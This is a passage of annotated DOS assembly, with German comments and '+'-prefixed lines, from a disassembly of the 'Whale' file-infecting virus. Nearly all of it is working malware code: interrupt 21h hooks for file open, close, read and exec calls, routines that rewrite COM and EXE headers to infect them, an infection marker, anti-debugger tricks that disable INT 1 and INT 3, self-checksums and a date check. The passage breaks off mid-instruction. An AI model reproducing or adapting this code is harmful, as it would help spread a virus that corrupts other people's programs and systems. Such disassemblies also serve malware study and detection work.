PUSH BX + MOV BX,[BX+04h] + XOR BX,5348h ; 'SH' --> 'FISH' ! + XOR BX,4649h ; 'FI' + ADD AX,BX + POP BX + MCODE 28 + JZ J02FF6 + ADD SP,+04h + JMP J02EA3 ; fertig +;================================================================= + DB 12h +;================================================================= +J02FA0: JMP J02F33 +;================================================================= +J02FA2: + MOV Word PTR DS:[0004h],DX + MOV BX,Word Ptr DS:[000Ch] + IN AL,01h ;?????!??????!???? + OR CX,CX + JZ J02FC0 + CMP CL,BL + JB J02FC0 + XCHG BX,DX + MOV Word PTR DS:[0004h],DX + XOR DX,AX + LOOP J02FA0 ; JMP J02F33, if CX <> 0 + ; ist identisch mit + ; "JMP J02FC0".... + JZ J02FCB ; -> J03251 -> J034D4 + + +J02FC0: ADD SI,@0478 + CALL J02AD2 ; ->keine Rckkehr vom CALL !<- +;------------------------------------------------------------------- + DB 0E9H,0A8h,09h,0EAh +;------------------------------------------------------------------- +J02FCB: JMP J03251 ; -> 34d4 +;=====================( no entry )==( muss (!) ausgefhrt werden )=== +J02FCE: MOV BYTE PTR CS:[SI+SwapCode_5],0E8h + ; Adresse J03259 + OR CX,CX ; Ist am anfang immer 20h + ; also wird 32 Mal diese Schleife + ; ausgefhrt und versucht, den + ; INT 1 zu setzen..... + JZ J02FCB ; Zur Arbeit ! + ;--------------------------------------------------- + ; INT 1 und INT 3 zerstren. + ;--------------------------------------------------- + MOV Word Ptr DS:[000Ch],BX + XOR DX,BX + MOV Word Ptr DS:[0004h],DX + XOR AX,DX + MOV Word Ptr DS:[000Ch],AX + JMP J02D00 ; schlechter Pfad ! +;========================================================( trash )=== +J02FEA: DB 081h,0c6h,090h,034h,0b9h,01ch + DB 000h,0f4h,0a4h,033h,0c9h,0e8h +;===================================================================== +;============================( zum Handler fr Read Seq. FCB.AH=14)=== +;===================================================================== +J02FF6: MDECODE 29 + POP DX + POP DS + MOV SI,DX + + PUSH CS + POP ES + MOV CX,0025h + MOV DI,Offset @FCB ; Kopiere FCB + REPZ MOVSB + + MOV DI,Offset @FCB + PUSH CS + POP DS + MOV DX,[DI+12h] ; HOLE FILESIZE nach DX:AX + MOV AX,[DI+10h] + ADD AX,Code_Len+0FH ; ADD filesize, 240fh + ADC DX,+00h + AND AX,0FFF0h ; Filesize auf (mod 16) normieren + MOV [DI+12h],DX +J03020: MOV [DI+10h],AX ; und zurueck + SUB AX,Code_Len-4 ; 23fc abziehen + SBB DX,+00h + MOV [DI+23h],DX ; und nach RandomRec kopieren ?!? + MOV [DI+21h],AX ; Dadurch wird das FILE in + ; einem Record gelesen ( aber nur, + ; wenn's kleiner als 1 Segment ist) + + MOV CX,001Ch ; Lese 1Ch byte (EXE-Header) + MOV WORD Ptr DS:[DI+0Eh],0001h + + MOV AH,27h ; READ RANDOM BLOCK FCB + MOV DX,DI + CALL CS:[@INT21] + MCODE 29 + JMP J02EA3 ; fertig +;===================================================================== +;================================================( AUS DEM HIER : )=== +;===================================================================== +J03047: DB 03BH,0DEH ; CMP BX,SI + DB 074H,0D5H ; JZ J03020 + RETN +;===================================================================== +;===============================================( Wird DAS HIER : )=== +;===================================================================== + ;J03047:XOR WORD PTR CS:[SI],BX + ; NOP + ; RET +;===================================================================== +;============================================( DER CODE-PATCHER )=== +;============================================( SI kommt mit 210Ah )=== +;===================================================================== +PATCH: PUSH BX + + ADD SI,OFFSET J0492F-OFFSET J0491A + MOV BX,157Dh ; SI = 211F / 492F + CALL J03047 + + ADD SI,+02h ; SI = 2121 / 4931 + MOV BX,758Bh + CALL J03047 + + ADD SI,+02h ; SI = 2123 / 4933 + MOV BX,0081h + CALL J03047 + + ADD SI,+08h ; SI = 212B / 493B + MOV BX,0A08h + CALL J03047 + + ADD SI,+02h ; SI = 212D / 493D + MOV BX,302Fh + CALL J03047 + + ADD SI,+02h ; SI = 212f / 493F + MOV BX,02A5h + CALL J03047 + ;----------------------( DECODE ist jetzt 'anders')--- + + ADD SI,OFFSET J0499D-OFFSET J04941+2 + MOV BX,157Dh ; SI = 218D / 499D + CALL J03047 + + ADD SI,+05h ; SI = 2192 / 49A2 + MOV BX,0A09Fh + CALL J03047 + + ADD SI,+0Ah ; SI = 219C / 49AC + MOV BX,00A7h + CALL J03047 + + ADD SI,+0Ch ; SI = 21A8 / 49B8 + MOV BX,872Dh + CALL J03047 + + ADD SI,+02h ; SI = 21AA / 49BA + MOV BX,7829h + CALL J03047 + + ADD SI,+02h ; SI = 21AC / 49BC + MOV BX,4229h + CALL J03047 + + ADD SI,+02h ; SI = 21AE / 49BE + MOV BX,1AC0h + CALL J03047 + ;---------------( CODEIT ist jetzt auch 'anders' )--- + + ADD SI,OFFSET J04A2A-OFFSET J049C0 + 2 + ; SI = 221A / 4A2A + MOV BX,1114h + CALL J03047 + + ADD SI,OFFSET J04A39 - OFFSET J04A2A + ; SI = 2229 / 4A39 + MOV BX,0000h ; ? NOP ? + CALL J03047 + + ADD SI,OFFSET J04A44 - OFFSET J04A39 + ; SI = 2234 / 4A44 + MOV BX,02E3h + CALL J03047 + + POP BX + RETN +;===================================================================== +;=================================( Handler fr GET FILESIZE /FCB )=== +;===================================================================== +J030DF: MDECODE 30 + PUSH CS + POP ES + MOV DI,Offset @FCB + MOV CX,0025h ; Kopiere FCB + MOV SI,DX + REPZ MOVSB + + PUSH DS + PUSH DX + PUSH CS + POP DS + + MOV AH,0Fh ; OPEN FCB + MOV DX,Offset @FCB ; FCB steht an DS:DX + CALL CS:[@INT21] + MOV AH,10h ; CLOSE FCB ! + CALL CS:[@INT21] + TEST BYTE Ptr DS:[@FCB+17H],80h + POP SI + POP DS + MCODE 30 + + JZ J03182 + + LES BX,DWord ptr CS:[@FCB+010h] ; File-Size + +J03117: MDECODE 31 + MOV AX,ES + SUB BX,Code_len + SBB AX,0000h + XOR DX,DX + MOV CX,WORD PTR CS:[@FCB+0eh] ; Rec-Size + DEC CX + ADD BX,CX + ADC AX,0000h + INC CX + DIV CX + MOV [SI+23h],AX + XCHG AX,DX ; + XCHG AX,BX + DIV CX + MOV [SI+21h],AX + MCODE 31 + JMP J02EA3 ; fertig +;===================================================================== +;=======================================( setzt INT 02 auf "IRET" )=== +;===================================================================== +StopINT_02: MDECODE 32 + CALL PushALL + IN AL,21h + OR AL,02h ; setze Bit 2 + OUT 21h,AL + + MOV AL,02h + CALL GetInt_AL ; GET INT 02 + ; ergebnis in ES:BX + MOV AX,CS ; AX = CS + MOV CX,ES + CMP AX,CX + JZ J03179 + MOV WORD PTR CS:[@INT02+2],ES + MOV WORD PTR CS:[@INT02 ],BX + + PUSH CS + POP DS + CALL J03170 +J03170: POP DX ; GET IP + ADD DX,OFFSET INT_02-OFFSET J03170 + + MOV AL,02h + CALL SetInt_AL ; SET INT 02 auf IRET + +J03179: CALL PopALL + MCODE 32 + RETN +;===================================================================== +INT_02: IRET ; KOPROZESSORFEHLER + MEMORY PARITY-FEHLER +;===================================================================== +J03182: JMP J02B8B ; CALL LOW_INT_21 + DB 0E8h +;===================================================================== +;=======================================( SET INT 02 zum Original )=== +;===================================================================== +Re_SET_Int_02: MDECODE 33 + CALL PushALL + + IN AL,21h + AND AL,0FDh ; lsche Bit 2 + OUT 21h,AL + + LDS DX,CS:[@INT02] ; OLD INT 02 + MOV AL,02h + CALL SetInt_AL ; SET INT 02 + CALL PopALL + MCODE 33 + RETN +;===================================================================== +;================================( Handler fr Open File / Handle )=== +;===================================================================== +J031A6: CALL GET_Current_PSP + CALL J039C3 ; ist die Datei ausfhrbar ? + JB J031F1 ; nein.... + CMP BYTE PTR CS:[D24A2],00h ; hab ich schon infiziert + JZ J031F1 + CALL J043B1 ; Vorarbeiten + CMP BX,0ffffh ; Fehler bei Vorarbeiten ?? + JZ J031F1 ; oder garkeine DATEI ?? +;===========================================()========================== + MDECODE 34 + DEC BYTE PTR CS:[D24A2] + PUSH CS + POP ES + + MOV CX,0014h + MOV DI,Offset D2452 ; ja ? wenn ich's wsst... + XOR AX,AX + REPNZ SCASW + + MOV AX,CS:[@PSP] + MOV ES:[DI-02h],AX + MOV ES:[DI+26h],BX + MOV [BP-04h],BX + MCODE 34 + +J031E7: AND BYTE PTR CS:[D24B3],0FEh ; CF lschen + JMP J02EA3 ; fertig + + DB 0E8h + +J031F1: JMP J02B8B ; CALL LOW_INT_21 +;===================================================================== +;===============================( Handler fr CLOSE FILE / Handle )=== +;===================================================================== +J031F4: MDECODE 35 + PUSH CS + POP ES + CALL GET_Current_PSP + MOV CX,0014h + MOV AX,CS:[@PSP] + MOV DI,Offset D2452 + MCODE 35 + +J0320C: REPNZ SCASW +J0320E: JNZ J03227 + CMP BX,ES:[DI+26h] + JNZ J0320C + MOV WORD PTR ES:[DI-02h],0000h + CALL J03642 ; infizieren ! + INC BYTE PTR CS:[D24A2] + JMP J031E7 + ;================================ + DB 0BBh + ;================================ +J03227: JMP J02B8B ; Call LOW-INT-21 + ;================================ + DB 3DH + ;================================ +;===================================================================== +;=============================================( Hole aktuelle DTA )=== +;===================================================================== +GetDTA: MDECODE 36 + MOV AH,2FH ; GET DTA + PUSH ES + CALL CS:[@INT21] + PUSH ES + POP DS + POP ES + MCODE 36 + RETN +;--------------------------------------------------------------------- +J03240: DB 0E9H,012H,003H ; JMP J03555 == NIRWANA ! +;===================================================================== +;=====================================( versteckter DECODE-Aufruf )=== +;===================================================================== +Decode: JMP J0491B ; CMP AX,16D5H +;-----------------------------------------------------------(trash)--- + JZ J03240 + SUB AX,12EFh + DEC SI + INC BH + JMP J02FEA +;===================================================================== +;=====(-----------------------------------------------------------)=== +;=====( Affengeiler Code )=== +;=====(-----------------------------------------------------------)=== +;=====( SP sichern in BP )=== +;=====( "C353" auf den Stack, wobei SS=CS & C353 = "PUSH BX, RET" )=== +;=====( Dann ein CALL dessen RET-Adresse vom Stack geholt wird. )=== +;=====( Dafr wird DX alias BP auf den Stack gelegt. Kuckuck ! )=== +;=====( Schliesslich wird nach SS:SP-2, also "PUSH BX, RET", )=== +;=====( gesprungen, also ein "RET" zur Adresse J034D4 ausgefhrt )=== +;=====(-----------------------------------------------------------)=== +;=====( Kein Wunder, da der Wal nach Fischen sucht ;-))) )=== +;===================================================================== +J03251: MOV DX,BP ; DX = BP + MOV BP,SP + MOV BX,0C353H + PUSH BX +J03259: CALL J0341A ; ursprnglich "INT 3" +J0325C DB 0BBH +;----------------------------------------------------------( Info )--- +; J0341A: POP BX ; BX = 325C +; ADD BX,OFFSET J034D4-Offset J0325C +; PUSH DX ; +; SUB BP,+02h ; BP = SP-2 +; DB 36H ; hat noch gefehlt :-) +; JMP BP ; = JMP DX / JMP 34D4 +;--------------------------( => )------ +; SS:SP-2 PUSH BX ; = 53h +; SS:SP-1 RET ; = C3h +;===================================================================== +;==============================================( Handler fr EXEC )=== +;===================================================================== +J0325D: OR AL,AL ; Ist AL = 0 ( = Load + execute ) ? + JZ J03264 ; JA !! + JMP J034FC +;===================================================================== +;================================================( EXEC AX = 4B00 )=== +;===================================================================== +J03264: MDECODE 37 + PUSH DS + PUSH DX + MOV Word ptr CS:[D2424+2],ES ; Adress of EPB + MOV Word ptr CS:[D2424 ],BX + LDS SI,DWord ptr CS:[D2424] + + MOV CX,000Eh ; kopiere epb in ds + MOV DI,Offset EPB + PUSH CS + POP ES + REPZ MOVSB + + POP SI + POP DS + MOV CX,0050h ; kopiere kommandozeile + MOV DI,Offset Cmd_Line + REPZ MOVSB + + MOV BX,0FFFFh ; wird wieder zerstrt + CALL PopALL + POP BP ; Original-BP + POP CS:[D24E6] ; CALLERs IP + POP CS:[D24E8] ; CALLERS CS + POP CS:[D24B3] ; CALLERS Flags + PUSH CS + + MOV AX,4B01h ; Load, but do not execute + POP ES ; Segment EPB + PUSHF + MOV BX,Offset EPB ; Offset EPB + CALL CS:[Low_INT_21H] + + MCODE 37 + + JNB J032DA ; JMP if kein Fehler + + OR WORD PTR CS:[D24B3],+01h; sonst CF setzen + PUSH CS:[D24B3] ; Flags + PUSH CS:[D24E8] ; CS + PUSH CS:[D24E6] ; IP + PUSH BP + LES BX,DWord ptr CS:[D2424] ; Alten EPB zurck + MOV BP,SP ; Alten SP + JMP IRET_Int21h ; und fertig +;====================================================== + DB 89h,04h +;=======================================( kein Fehler aufgetreten )=== +J032DA: MDECODE 38 + CALL GET_Current_PSP + PUSH CS + POP ES + MOV CX,0014h + MOV DI,Offset D2452 +J032EA: MOV AX,CS:[@PSP] + REPNZ SCASW + JNZ J032FF + MOV WORD PTR ES:[DI-02h],0000h + INC BYTE PTR CS:[D24A2] + JMP J032EA +;==================================================================== +J032FF: MCODE 38 + LDS SI,DWORD PTR CS:[D2503] ; Ist IP-Init = 1 ( WAL ! ) + CMP SI,+01h + JNZ J0334D ; nein. Dann infizieren + ; sonst wal ausblenden + MDECODE 39 + MOV DX,Word Ptr DS:[001Ah] + ADD DX,+10h + + MOV AH,51h + CALL CS:[@INT21] + + ADD DX,BX + MOV Word Ptr CS:[D2505],DX + PUSH Word Ptr DS:[0018h] + POP Word Ptr CS:[D2503] + + ADD BX,Word Ptr DS:[0012h] + ADD BX,+10h + MOV Word Ptr CS:[D2501],BX + + PUSH Word Ptr DS:[0014h] + POP Word Ptr CS:[D24FF] + + MCODE 39 + JMP J0345F +;--------------------------------------------------------------------- + DB 09h +;--------------------------------------------------------------------- +J0334D: JMP J03428 ; jmp zut Infect-routine +;===================================================================== +;===================================================( Selbst-Test )=== +;===================================================================== +J03350: MDECODE 40 + CALL PushALL + JMP J03362 + +J0335B: XOR AL,CS:[BX] + INC BX + LOOP J0335B + RETN +;-----------------------------------( netterweise werden hier die )--- +;-----------------------------------( 'echten' Labels publik ! )--- +J03362: XOR AL,AL + MOV BX,0021h ; 2831..2852 ; ENTRY...2852 + MOV CX,007Ah + CALL J0335B + MOV BX,0173h ; 2983..298d ; init SI + MOV CX,000Ah + CALL J0335B + MOV BX,0253h ; 2a63..2a7f ; trace... + MOV CX,001Ch + CALL J0335B + MOV BX,0550h ; 2d60..2d6a ; ????????????? + MOV CX,000Ah + CALL J0335B + MOV BX,0705h ; 2f15..2f55 + MOV CX,0040h + CALL J0335B + MOV BX,0790h ; 2fa0..2ff6 + MOV CX,0056h + CALL J0335B + MOV BX,0A30h ; 3240..3264 + MOV CX,0024h + CALL J0335B + MOV BX,0C0Ah ; 341a..3428 + MOV CX,000Eh + CALL J0335B + MOV BX,0CC4h ; 34d4..3510 + MOV CX,003Ch + CALL J0335B + MOV BX,105Ah ; 386a..3897 + MOV CX,002Dh + CALL J0335B + MOV BX,1106h ; 3916..393f + MOV CX,0029h + CALL J0335B + MOV BX,210Ah ; 491a..4981 + MOV CX,0067h + CALL J0335B + MOV BX,2173h ; 4983..4a56 + MOV CX,00D8h + CALL J0335B + MOV BX,236Ch ; 4b7c..4bb5 + MOV CX,0039h + CALL J0335B + MOV BX,1D7Dh ; 458d..45b2 + MOV CX,0025h + CALL J0335B + MOV BX,1C7Ch ; 448c..44ce + MOV CX,0042h + CALL J0335B + CMP AL,0E0h ; sic !! + JZ J03412 + ;----------------------------------------------------- + MOV WORD PTR CS:[D2598],0F4F4h ; = HLT + MOV BX,OFFSET D2598 + PUSHF + PUSH CS + PUSH BX + XOR AX,AX + MOV DS,AX + MOV WORD PTR DS:[0006h],0FFFFh ; SEGMENT Int 01 + CALL Debugger_Check ; STOP + ;----------------------------------------------------- +J03412: CALL PopALL + MCODE 40 +J03419: RETN +;====================================================( JMP J034D4 )=== +J0341A: POP BX ; BX = 325C + ADD BX,OFFSET J034D4-Offset J0325C ; BX = 34D4 + PUSH DX ; + SUB BP,+02h ; BP = SP + ;**************************************************** + DB 36H ; Seg-Prefix hat noch gefehlt + ;**************************************************** + JMP BP ; -> JMP DX -> JMP BX +;--------------------------------------------------------------------- + DB 0E9h,0DBh,000 +;-------------------------------( Nochmal Kontrolle, ob infiziert )--- +J03428: MDECODE 41 + MOV AX,[SI] + ADD AX,[SI+02h] + PUSH BX + MOV BX,[SI+04h] + + XOR BX,5348h ; 'SH' + XOR BX,4649h ; 'FI' + + ADD AX,BX + POP BX + MCODE 41 + JZ J034AF ; ist schon infiziert + PUSH CS + POP DS + MOV DX,Offset Cmd_Line + CALL J039C3 ; ist die Datei ausfhrbar ? + CALL J043B1 ; Vorarbeiten + INC BYTE PTR CS:[D24EF] + CALL J03642 ; infizieren + DEC BYTE PTR CS:[D24EF] +;===================================================================== +;===================================( Datei im RAM wird gestartet )=== +;===================================================================== +J0345F: MDECODE 42 + + MOV AH,51h ; GET current PSP + CALL CS:[@INT21] + + CALL SaveRegisters + CALL Patch_IBMDOS + CALL GetRegsFromVirstack + MOV DS,BX + MOV ES,BX + PUSH WORD PTR CS:[D24B3] ; CALLERs FLAGS + PUSH WORD PTR CS:[D24E8] ; Caller-CS + PUSH WORD PTR CS:[D24E6] ; Caller-IP + POP Word Ptr DS:[000Ah] + POP Word Ptr DS:[000Ch] + PUSH DS + MOV AL,22h + LDS DX,Dword Ptr DS:[000Ah] + CALL SetInt_AL ; SET INT 22 TO CALLER + POP DS + POPF ; POP Original-Flags + POP AX ; POP RET-Adresse + MOV SP,CS:[D24FF] ; SP-INIT + MOV SS,CS:[D2501] ; SS-INIT + MCODE 42 + JMP DWORD PTR CS:[D2503] ; EXEC Programm +;===================================================================== +;==============( Datei ist infiziert. Wal desinfiziert sie im RAM )=== +;===================================================================== +; Offset 100H JMP 4BCC = E9 C9 4A +; Offset 2814 EXE_ID E9 pq rs , Savebytes +; Offset 4BCC Vir-Entry +; 2814-4AC9-100h = DC4B usw. +;===================================================================== +J034AF: MDECODE 43 ; SI zeigt auf COM-START + MOV BX,[SI+01h] ; Sprungziel nach BX + MOV AX,[BX+SI+0DC4Bh] ; -23B5, Diff -3 zw. + MOV [SI],AX ; Savebytes und 4BCC + MOV AX,[BX+SI+0DC4Dh] ; -23B3 + MOV [SI+02h],AX + MOV AX,[BX+SI+0DC4Fh] ; -2361 + MOV [SI+04h],AX + CALL J045D0 ; 'aktiv-msg' + MCODE 43 + JMP J0345F ; +;===================================================================== +;================================( EINTRITT IN "ARBEITSPHASE" )=== +;================================( Durch die erste Anweisung wird )=== +;================================( der JMP zum Relokator erzeugt )=== +;===================================================================== +J034D4: MOV BYTE PTR CS:[SI+SwapCode_2],0E9h + ; JMP bei 3A20 erzeugen !! + POP BP ; BP = 20h + MOV CX,0004h ; Das nchste RET macht wieder + ; "PUSH BX,RET" + MOV BX,DS ; BX = DS + OR BX,BP ; BX = DS or 20h + MOV DS,BX ; DS = DS or 20H + +J034E4: SHL BX,1 ; BX = BX * 16 + LOOP J034E4 + + MOV AX,CX ; AX = 0 + MOV CX,001Ch ; CX = 1C + +J034ED: ADD AH,[BX] + INC BX + LOOP J034ED + + PUSH AX ; AX auf den Stack + + MOV CX,[BX] + PUSH CS + POP AX + SHR BH,1 + JMP J03919 +;===================================================================== +;================================================( Gehrt zu EXEC )=== +;===================================================================== +J034FC: CMP AL,01h ; AX = 4B01 ( durch Debugger und Wal ) + JZ J03510 ; ja , durch Debugger und Wal. + JMP J02B8B ; nein, AX=4B03. Low-int-21h rufen +;===================================================================== +;===========================================================(trash)=== +;===================================================================== +J03503: DB 01,0cbh,81h,0fbh,34h,28h,72h,0f8h,81h,0f1h,21h,21h,0a1h + ;--------------------------------------- + ;J03503:ADD BX,CX + ; CMP BX,2834h ; OFFSET VIR_NAME + ; JB J03503 + ; XOR CX,2121h ; "!!" + ; MOV AX,WORD PTR DS:[30E8h] + ; STD + ; SUB [BX+SI],AL + ;--------------------------------------- +;===================================================================== +;==============================================( EXEC mit 4B01h )=== +;==============================================( Aufruf durch WAL )=== +;==============================================( und Debugger )=== +;===================================================================== +J03510: MDECODE 44 + OR WORD PTR CS:[D24B3 ],+01h ; CALLERS Flags + MOV Word ptr CS:[D2424+2],ES ; EPB sichern + MOV Word ptr CS:[D2424 ],BX + CALL PopALL + CALL CS:[@INT21] ; int 21h rufen + CALL PushALL + LES BX,DWord ptr CS:[D2424] ; EPB zurck + LDS SI,DWord ptr ES:[BX+12h] ; CS:IP holen + MCODE 44 + JNB J03542 ; ---> Infektion + JMP J035E0 ; ---> fertig +;=========================================================()======== +J03542: AND BYTE PTR CS:[D24B3],0FEh; CF lschen + CMP SI,+01h ; ist IP-INIT=1 (infiziert) + JZ J0358E + MDECODE 45 + MOV AX,[SI] + ADD AX,[SI+02h] + PUSH BX + MOV BX,[SI+04h] + XOR BX,5348h ; "SH" + XOR BX,4649h ; "FI" + ADD AX,BX + POP BX + MCODE 45 + JNZ J035C3 ; nicht markierbar, keine Infektion + ;---------------------( Dateianfang manipulieren )--- + MDECODE 46 + MOV BX,[SI+01h] + MOV AX,[BX+SI+0DC4Bh] ; SIEHE 34af! + MOV [SI],AX + MOV AX,[BX+SI+0DC4Dh] + MOV [SI+02h],AX + MOV AX,[BX+SI+0DC4Fh] + MOV [SI+04h],AX + MCODE 46 + JMP SHORT J035C3 ; Terminate-Adresse festlegen + +;===================================================================== +;=====================================( Datei ist schon infiziert )=== +;===================================================================== +J0358E: MDECODE 47 ; ES:BX = EPB + MOV DX,WORD PTR DS:[001Ah] ; DS:SI = CS:IP der Datei + CALL GET_Current_PSP + + MOV CX,CS:[@PSP] + ADD CX,+10h + ADD DX,CX + MOV ES:[BX+14h],DX + + MOV AX,Word Ptr DS:[0018h] + MOV ES:[BX+12h],AX + + MOV AX,Word Ptr DS:[0012h] + ADD AX,CX + MOV ES:[BX+10h],AX + + MOV AX,Word Ptr DS:[0014h] + MOV ES:[BX+0Eh],AX + MCODE 47 +;===================================================================== +;==============================( Installation des INT 22-Handlers )=== +;===================================================================== +J035C3: MDECODE 48 + CALL GET_Current_PSP + MOV DS,CS:[@PSP] + MOV AX,[BP+02h] + MOV Word Ptr DS:[000Ah],AX ; OFFSET int 22-Handler + MOV AX,[BP+04h] + MOV Word Ptr DS:[000Ch],AX ; Segment int 22-Handler + MCODE 48 +J035E0: JMP J02EA3 ; Fertig +;===================================================================== +;====================================( kann ja fast nicht sein ...)=== +;===================================================================== +; erzeugt wird : +; DB 01h +; DW CS +; DW SS +; DW SP +;-------------------------------------------------------------------- +J035E3: MOV WORD PTR CS:[023Ah],CS ;2a4a + MOV WORD PTR CS:[023Ch],SS ;2a4c + MOV WORD PTR CS:[023Eh],SP ;2a4e + MOV BYTE PTR CS:[0239h],01h ;2a49 + PUSH DS + POP AX ; ist auch bloss Mll ! +;===================================================================== +;=================================( Kontrolle des Verfalls-Datums )=== +;===================================================================== +Check_Verfallsdatum: + MDECODE 49 + CALL PushALL + MOV AH,2Ah ; GET System Time & Date + CALL CS:[@INT21] ; + CMP CX,07C8h ; 1992 + JNB J0361A ; CX >= 1992 : Setze [Error],1 + CMP CX,07C7h ; 1991 + JNZ J03620 ; CX <> 1991 : Lasse [Error] + CMP DH,04h ; April + JB J03620 ; DH < APRIL : Lasse [Error] + ;----------------------------------------------------- +J0361A: MOV BYTE PTR CS:[Error],01h +J03620: CMP BYTE PTR CS:[Error],00h + JZ J0362F + CALL PopALL + POP AX + JMP J03632 + ;-------------- +J0362F: CALL PopALL +J03632: MCODE 49 + CMP BYTE PTR CS:[Error],00h + JZ J03641 + JMP J03761 ; Returnadresse bleibt auf Stack... +J03641: RETN +;===================================================================== +;==================================( "JMP Decode_Whale" schreiben )=== +;===================================================================== +J03642: MDECODE 50 + ;------------------------------------------------------- + MOV BYTE PTR CS:[0001h],0E9h ; JMP 23BC /4BCC + MOV BYTE PTR CS:[0002h],0B8h ; CS:0001=CS:2811 + MOV BYTE PTR CS:[0003h],023h + ;-------------------------------------------------- + CALL Trace_int_13h + + CALL J0378C ; errechnet unter anderem Paras fr File + ; SI = bentigte Paragrafen + ; CX = 10h + ; DX:AX = Filesize gerundet + ; auf nchsten Paragrafen + + MOV BYTE Ptr DS:[OFFSET EXE_FLAG-Offset VirStart],01h + CMP WORD Ptr DS:[CodBuf],'MZ' + MCODE 50 + JZ J0367E + DEC BYTE Ptr DS:[Offset Exe_Flag-Offset VirStart] + + JZ J036F9 ; Wenn EXE-FLAG "1" war, + ; also immer (!) +;===================================================================== +;=========================================( EXE-Header auswerten )=== +;=========================================( Infektion vorbereiten )=== +;=====================( die Berechnung scheint fehlerhaft zu sein )=== +;===================================================================== +J0367E: MDECODE 51 + MOV AX,WORD PTR DS:[CodBuf+4] ; Pages + SHL CX,1 ; CX = 20h + MUL CX ; AX ist ((Lnge-1) div 200h)*20h + ; Also jetzt : (Lnge-1) DIV 10H + ; AX enthlt die bentigte Anzahl + ; Paragrafen, um EXE zu laden. + ADD AX,0200h ; AX=AX+200h, gibt keinen Sinn + CMP AX,SI ; Vergleiche AX mit Max-Paras + MCODE 51 + JB J036F6 ; jmp, wenn AX kleiner ist + + MOV AX,WORD PTR DS:[CodBuf+0Ah] ; MinFree + OR AX,WORD PTR DS:[CodBuf+0Ch] ; MaxFree + JZ J036F6 + MDECODE 52 + MOV DX,Word ptr DS:[FileSize+2] + MOV CX,0200h + MOV AX,Word ptr DS:[FileSize ] + DIV CX ; AX = (DX:AX) / 512; -> Pages + OR DX,DX ; Blieb ein Rest ??? + MCODE 52 + JZ J036B8 ; ja.. + INC AX +J036B8: MOV WORD PTR DS:[CodBuf+2 ],DX ; Lnge LastPage + MOV WORD PTR DS:[CodBuf+4 ],AX ; Anzahl Pages + CMP WORD PTR DS:[CodBuf+14h],+01h ; IP-Init = 1? + JNZ J036CA ; ( Whale !) + JMP J03761 ; dann fertig ! +;-------------------------------------------------------------------- + DB 0E8h +;-------------------------------------------------------------------- +J036CA: CALL Check_Verfallsdatum + MDECODE 53 + MOV WORD PTR DS:[CodBuf+14h],0001h + ; IP-INIT = 0001h + MOV AX,SI ; MaxParas -> AX + SUB AX,WORD PTR DS:[CodBuf+8] ; AX=AX-Headerparas + MOV WORD PTR DS:[CodBuf+16h ],AX ; CS-INIT <-AX !!!! + ADD WORD PTR DS:[CodBuf+4 ],+12h ; 12 Pages dazu + ; (== Whale-Size ) + ;----------------------------------------------------------- + ; eine andere Art, ein Virus zu entdecken : + ; Wenn ein EXE wie ein COM initialisiert wird... + ;----------------------------------------------------------- + MOV WORD PTR DS:[CodBuf+010h],0FFFEh; SP-Init = COM-LIKE + MOV WORD PTR DS:[CodBuf+ 0Eh],AX ; SS-Init = CS-Init + MCODE 53 + CALL Infect_File +J036F6: JMP J03761 +;===================================================================== +;=======================================( Verfahren fr COM-Files )=== +;===================================================================== +J036F9: CMP SI,0F00h ; COM-Size > 61440 Byte ?!? + JNB J03761 ; Dann geht es eben nicht ... + + ;--------------( merken der ersten 6 Byte des COM )--- + MDECODE 54 + MOV AX,WORD PTR DS:[CodBuf ] ; whale: + MOV WORD PTR DS:[0004h],AX ; AX = 20CC + ADD DX,AX ; DX = 0, da COM + MOV AX,WORD PTR DS:[CodBuf+2] + MOV WORD PTR DS:[0006h],AX ; AX = 0 + ADD DX,AX ; DX = 20CC + MOV AX,WORD PTR DS:[CodBuf+4] ; AX = 0 + MOV WORD PTR DS:[0008h],AX + + XOR AX,5348h ; 'SH' !! ; AX = 5348 + XOR AX,4649h ; 'FI' !! ; AX = 1501 + + ADD DX,AX ; DX = 35CD + MCODE 54 + JZ J03761 ; DX = 0 -> Keine Infektion , + ; File kann nicht markiert werden. + + MOV AX,WORD PTR DS:[D24F2] ; Hole Fileattribut + AND AL,04h ; Ist es SYSTEM ? + JNZ J03761 ; jmp, wenn ja + CALL Check_Verfallsdatum + + MDECODE 55 + ;---------------------( JMP am COM-Start erzeugen )--- + MOV CL,0E9h + MOV AX,0010h + MOV BYTE PTR DS:[CodBuf],CL + MUL SI ; AX = COM-Lnge in Byte, + ; auf ganzen Paragrafen + ; gerundet + ADD AX,23B9h ; So weit also + 3 Byte + ; zum De-Cryptor + MOV WORD PTR DS:[CodBuf+1],AX; hier also "JMP J04BCC" + ;---------------------------------------------------- + ;-----------------( File als infiziert markieren )--- + ;---------------------------------------------------- + MOV AX,WORD PTR DS:[CodBuf ]; AX = C9E9 + ADD AX,WORD PTR DS:[CodBuf+2]; AX = C9E9+004A =CA33 + NEG AX ; AX = - AX = 35CD + + XOR AX,4649h ; 'FI' !! ; AX = 7384 + XOR AX,5348h ; 'SH' !! ; AX = 20CC (!!) + + MOV WORD PTR DS:[CodBuf+4],AX; Siehe Label "start" + MCODE 55 + CALL Infect_File +;--------------------------------------( Ende der Infektionsphase )--- +J03761: MDECODE 56 + + MOV AH,3Eh ; CLOSE FILE + CALL CS:[@INT21] + + MOV CX,CS:[D24F2] + MOV AX,4301h ; Change File-Attribut + MOV DX,CS:[D24F4] ; Offset Filename + MOV DS,CS:[D24F6] ; Segment Filename + + CALL CS:[@INT21] + CALL J048CD ; RESET Int 13h und Int 24h + MCODE 56 ; Alles ist so wie vorher... + RETN +;===================================================================== +;====================================( Vorbereitung fr Infektion )=== +;===================================================================== +J0378C: MDECODE 57 + PUSH CS + MOV AX,5700h ; Get File-date + POP DS + CALL CS:[@INT21] + + MOV WORD PTR DS:[FileTime],CX ; Uhrzeit + + MOV AX,4200h ; SEEK Fileanfang + MOV Word Ptr DS:[FileDate],DX + XOR CX,CX + XOR DX,DX + CALL CS:[@INT21] + + MOV AH,3Fh ; Read file + MOV DX,OFFSET CodBuf ; nach DS:DX + MOV CL,1Ch ; 1C byte ( EXE-Header ! ) + CALL CS:[@INT21] + + XOR CX,CX ; Weils so schoen war ... + MOV AX,4200h + XOR DX,DX + CALL CS:[@INT21] + + MOV CL,1Ch ; diesmal nach DS:0004 lesen + MOV AH,3Fh ; == CS:2814 + MOV DX,0004h + CALL CS:[@INT21] + + XOR CX,CX ; seek file-Ende + MOV AX,4202h + MOV DX,CX + CALL CS:[@INT21] + + MOV Word Ptr 